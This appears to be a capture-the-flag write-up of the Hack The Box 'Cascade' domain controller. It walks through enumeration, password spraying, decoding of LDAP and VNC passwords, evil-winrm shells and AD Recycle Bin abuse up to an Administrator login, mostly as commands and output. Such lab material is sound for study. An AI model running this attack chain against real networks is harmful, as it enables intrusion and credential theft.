Prep for OSCP — HTB [M] Cascade — Writeup
You can read the article from the medium also.
Cascade is a medium difficulty Windows machine configured as a Domain Controller.
Information Gathering
Starting with nmap command.
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─$ nmap -sC -sV -vvv -oN enum/nmap -Pn 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up, received user-set (0.089s latency).
Scanned at 2024-05-01 10:20:03 EDT for 108s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-05-01 14:20:16Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Since we see that dns, kerberos and ldap ports are open, we can say that this is a DC machine.
enum4linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ enum4linux -a 10.10.10.182 | tee -a enum/enum4linux
...
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
...
We can try ASREPRoast attack with these users.
ASREPRoast
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ sudo impacket-GetNPUsers CASCADE/ -dc-ip 10.10.10.182 -format hashcat -outputfile asrep.hashes -usersfile usernames.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
No hashes are found. We can try password spraying.
Password Spraying with Usernames
1
└─$ crackmapexec smb 10.10.10.182 -u usernames.txt -p usernames.txt | grep +
No credentials are found. We can enumerate LDAP.
Ldapsearch
1
2
3
4
└─$ ldapsearch -x -H ldap://10.10.10.182 -s base namingcontexts
...
namingContexts: DC=cascade,DC=local
...
We take that namingContext and run the command again.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ ldapsearch -x -H ldap://10.10.10.182 -b "DC=cascade,DC=local"
...
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
...
Now we found some valuable fields! We decode that cascadeLegacyPwd as base64. So r.thompson:rY4n5eva is our entrance ticket. To be regular, i parse this informations as:
1
2
└─$ echo "r.thompson:Y4n5eva" >> creds
└─$ echo "rY4n5eva" >> valid_passwords
I don’t forget to spray passwords also. We list smb shares with r.thompson user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ smbmap -H 10.10.10.182 -u r.thompson -p "rY4n5eva"
...
[+] IP: 10.10.10.182:445 Name: cascade.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
We couldn’t get shell with these credentials. We can list examine Data share to check if it’s contains any information leakage.
We found a file named Meeting_Notes_June_2018.htmland it looks like an email.
I will remember that TempAdmin thing but for now i proceed with other files. I found a reg file in s.smith’s folder.
1
2
3
4
5
6
└─$ cat VNC\ Install.reg
Windows Registry Editor Version 5.00
...
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
...
I searched at google as “vnc install reg decrypt” and found that link. As the link says:
1
2
3
4
└─$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|
00000008
And our password is sT333ve2 for s.smith. Quickly check that credentials and add to our creds and valid_passwords files.
1
2
3
4
5
└─$ crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
└─$ echo "s.smith:sT333ve2" >> creds
└─$ echo "sT333ve2" >> valid_passwords
Initial Foothold
We can now get shell in evil-winrm with s.smith’s credentials.
1
2
3
4
5
6
7
8
9
10
11
└─$ evil-winrm -i 10.10.10.182 -u "cascade.local\s.smith" -p 'sT333ve2'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>
Post-Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\s.smith\Desktop> net user s.smith
User name s.smith
Full Name Steve Smith
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/28/2020 8:58:05 PM
Password expires Never
Password changeable 1/28/2020 8:58:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script MapAuditDrive.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
I saw that logon script is configured as MapAuditDrive.vbs. Logon scripts are generally located in NETLOGON share.
```bash
└─$ cat MapAuditDrive.vbs
'MapAuditDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "F:"
strRemotePath = "\\CASC-DC1\Audit$"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
And it redirected to Audit$ share.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith
Password for [WORKGROUP\s.smith]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1625283 blocks available
When we examined the files, in the DB\Audit.db database, we see user:password informations at Ldap table.
At first I thought that CascAudit.exe can decrypt file, and i tried to run exe in my Windows host. I couldn’t run it because of dependencies and it was really not necessary to run it. We can make reverse engineering on this binary file with ILSPY.
After ILSPY program, I found a function in code named DecryptString.
And I searched in google for “decrypt aes” and use this site with above informations. Secret Key is the ‘key’ parameter where code calls this function.
And our password is w3lc0meFr31nd for arksvc. Quickly check that credentials and add to our creds and valid_passwords files.
1
2
3
4
5
└─$ crackmapexec smb 10.10.10.182 -u arksvc -p w3lc0meFr31nd
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\arksvc:w3lc0meFr31nd
└─$ echo "arksvc:w3lc0meFr31nd" >> creds
└─$ echo "w3lc0meFr31nd" >> valid_passwords
Privilege Escalation
We logon with evil-winrm via arksvc user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ evil-winrm -i 10.10.10.182 -u 'arksvc' -p 'w3lc0meFr31nd'
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 10:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
We see that arksvc user is assigned to a administration privileged group named AD Recycle Bin. By getting help from this hacktricks.xyz link, we could reveal sensitive information.
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
I search for TempAdmin string in this output and saw the cascadeLegacyPwd again. If we decode this field:
1
2
└─$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
And if we check credentials if it’s true:
1
2
└─$ crackmapexec smb 10.10.10.182 -u Administrator -p 'baCT3r1aN00dles'
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\Administrator:baCT3r1aN00dles (Pwn3d!)
Conclusions
I’ve to say that, the part where we examine ldapsearch output is hard to think. If you prepare for OSCP exam, OSCP does not want you to try hard like that.
From a good point of view, I added to examine ldapsearch outputs into my checklist.
First time, I made reverse engineering with ILSPY.
I noticed the hacktricks privileged groups link and added into my windows privilege escalation checklist.